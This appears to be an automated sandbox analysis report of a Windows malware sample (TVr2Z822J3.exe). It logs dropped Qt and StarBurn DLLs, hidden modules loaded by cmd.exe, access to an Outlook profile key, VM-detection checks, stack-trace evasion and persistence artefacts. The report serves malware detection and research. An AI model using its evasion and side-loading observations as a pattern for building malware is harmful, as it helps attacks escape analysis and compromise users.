Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: qrdbuq.11.dr

LNK file: ..\..\..\..\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe

Source: C:\Windows\SysWOW64\cmd.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Drops PE files to the user root directory

Source: TVr2Z822J3.exe

Static file information: File size 11140776 > 1048576

Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb33 source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362612828.00007FFB0C910000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 0000000A.00000002.1432062539.00007FFB0BA30000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1342713513.00007FFB0B12C000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 0000000A.00000002.1428560349.00007FFB09B4C000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: TVr2Z822J3.exe, 00000006.00000003.1296900667.0000000000960000.00000004.00001000.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1335709365.000001AD5F9BC000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1363124751.00007FFB1D895000.00000002.00000001.01000000.0000000D.sdmp, ActiveISO.exe, 0000000A.00000002.1432759875.00007FFB1D545000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: ntdll.pdb source: ActiveISO.exe, 00000008.00000002.1340382265.000001AD62D80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1340073961.000001AD62989000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1425546704.000002B7CEA8F000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426247184.000002B7CEE80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426767848.000002B7CF088000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962417537.0000000003BBB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964900392.00000000057BB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966623777.00000000065B7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966928847.00000000067B4000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964505621.00000000053B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962736909.0000000003FB5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963421020.00000000047BD000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963946025.0000000004DBC000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Network.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 0000000B.00000002.1654874438.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655515118.0000000005570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: ActiveISO.exe, 00000008.00000002.1340382265.000001AD62D80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1340073961.000001AD62989000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1425546704.000002B7CEA8F000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426247184.000002B7CEE80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426767848.000002B7CF088000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962417537.0000000003BBB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964900392.00000000057BB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966623777.00000000065B7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966928847.00000000067B4000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964505621.00000000053B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962736909.0000000003FB5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963421020.00000000047BD000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963946025.0000000004DBC000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, 0000000B.00000002.1654874438.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655515118.0000000005570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: ActiveISO.exe, 00000008.00000003.1327940591.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360332952.00007FFB0BCC6000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 0000000A.00000002.1431665279.00007FFB0B9D6000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362612828.00007FFB0C910000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 0000000A.00000002.1432062539.00007FFB0BA30000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: TVr2Z822J3.exe, 00000006.00000003.1296900667.0000000000960000.00000004.00001000.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1335709365.000001AD5F9BC000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362864576.00007FFB1C261000.00000002.00000001.01000000.0000000C.sdmp, ActiveISO.exe, 0000000A.00000002.1432442405.00007FFB18B81000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1359749074.00007FFB0B5A1000.00000002.00000001.01000000.0000000A.sdmp, ActiveISO.exe, 0000000A.00000002.1430496192.00007FFB0A751000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362006100.00007FFB0C491000.00000020.00000001.01000000.00000006.sdmp, ActiveISO.exe, 0000000A.00000002.1431078979.00007FFB0A961000.00000020.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbF source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1342713513.00007FFB0B12C000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 0000000A.00000002.1428560349.00007FFB09B4C000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdbH source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362006100.00007FFB0C491000.00000020.00000001.01000000.00000006.sdmp, ActiveISO.exe, 0000000A.00000002.1431078979.00007FFB0A961000.00000020.00000001.01000000.00000011.sdmp

Source: vcruntime140.dll.6.dr

Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]

Source: C:\Users\user\Desktop\TVr2Z822J3.exe

Code function: 6_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

6_2_00406D5D

Source: itpyyyx.25.dr	Static PE information: real checksum: 0x28ec4c should be: 0x2950af
Source: josveh.11.dr	Static PE information: real checksum: 0x28ec4c should be: 0x2950af
Source: Qt5Core.dll.8.dr	Static PE information: real checksum: 0x5e2d16 should be: 0x5e3f3b
Source: Qt5Core.dll.6.dr	Static PE information: real checksum: 0x5e2d16 should be: 0x5e3f3b

Source: vcruntime140.dll.6.dr	Static PE information: section name: _RDATA
Source: vcruntime140.dll.8.dr	Static PE information: section name: _RDATA
Source: UploadAlt_Ti.exe.11.dr	Static PE information: section name: Shared
Source: josveh.11.dr	Static PE information: section name: .xdata
Source: josveh.11.dr	Static PE information: section name: hwn
Source: itpyyyx.25.dr	Static PE information: section name: .xdata
Source: itpyyyx.25.dr	Static PE information: section name: hwn

Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Code function: 6_2_00411C20 push eax; ret		6_2_00411C4E
Source: C:\Users\user\ActiveISO.exe	Code function: 8_2_00007FFB0BCAD83A push rdx; retf		8_2_00007FFB0BCAD83B

Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5PrintSupport.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5PrintSupport.dll	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\josveh	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\StarBurn.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\ActiveISO.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\itpyyyx	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\StarBurn.dll	Jump to dropped file

Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5PrintSupport.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\ActiveISO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\StarBurn.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\josveh			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\itpyyyx			Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\Qt5PrintSupport.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\ActiveISO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	File created: C:\Users\user\StarBurn.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JOSVEH
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\ITPYYYX

Source: C:\Users\user\ActiveISO.exe

Code function: 8_2_00007FFB0BCAC840 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00007FFB0BCAC840

Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\cmd.exe

API/Special instruction interceptor: Address: 6D143B54

Source: C:\Users\user\ActiveISO.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,_strlwr,strstr,free,GetComputerNameA,getenv,GetDiskFreeSpaceA,	8_2_00007FF65374C0B0
Source: C:\Users\user\ActiveISO.exe	Code function: GetAdaptersInfo,_strlwr,strstr,free,	8_2_00007FF65374BFF0
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Code function: GetAdaptersInfo,_strlwr,strstr,free,	10_2_00007FF6B1FFBFF0
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,_strlwr,strstr,free,GetComputerNameA,getenv,GetDiskFreeSpaceA,	10_2_00007FF6B1FFC0B0

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\josveh			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\itpyyyx			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 6844	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 6960	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 2436	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Code function: 6_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	6_2_0040301A
Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Code function: 6_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	6_2_00402B79
Source: C:\Users\user\ActiveISO.exe	Code function: 8_2_00007FFB0BC7A370 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,	8_2_00007FFB0BC7A370

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: TVr2Z822J3.exe, 00000006.00000002.1364214147.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
